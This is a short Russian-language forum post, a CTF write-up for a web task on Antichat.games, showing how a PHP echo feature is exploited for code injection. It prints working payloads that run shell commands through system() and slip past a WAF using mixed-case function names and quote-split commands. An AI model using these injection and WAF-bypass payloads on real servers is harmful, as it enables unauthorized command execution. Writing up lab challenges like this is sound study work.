ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   Writeup обходной путь (Web Antichat.games) (https://forum.antichat.xyz/showthread.php?t=1642762)

tree 13.12.2023 18:45
Привет! Разберем решение таска Обходной путь
Функционал приложения php функция - echo. появляется мысль о эксплутации php injection попробуем вывести phpinfo()

https://forum.antichat.xyz/attachmen...2477113436.png

Сработало! значит попробуем выполнить команды на сервере через функцию system
echo '123';system(”id”);

https://forum.antichat.xyz/attachmen...2477206743.png

WAF нас блочит, значит будем пробовать обойти фильтрацию.
echo '123';sYsTem("id");

https://forum.antichat.xyz/attachmen...2477253977.png

Отлично! Пробуем посмотреть файлы в каталоге.
echo '123';sYsTem("ls");
но WAF снова нас заблочил, значит и тут найти обходной путь
echo ‘123’;sYsTem("'l''s'"’);

https://forum.antichat.xyz/attachmen...2477455831.png

Дальше остается найти только флаг


Время: 06:56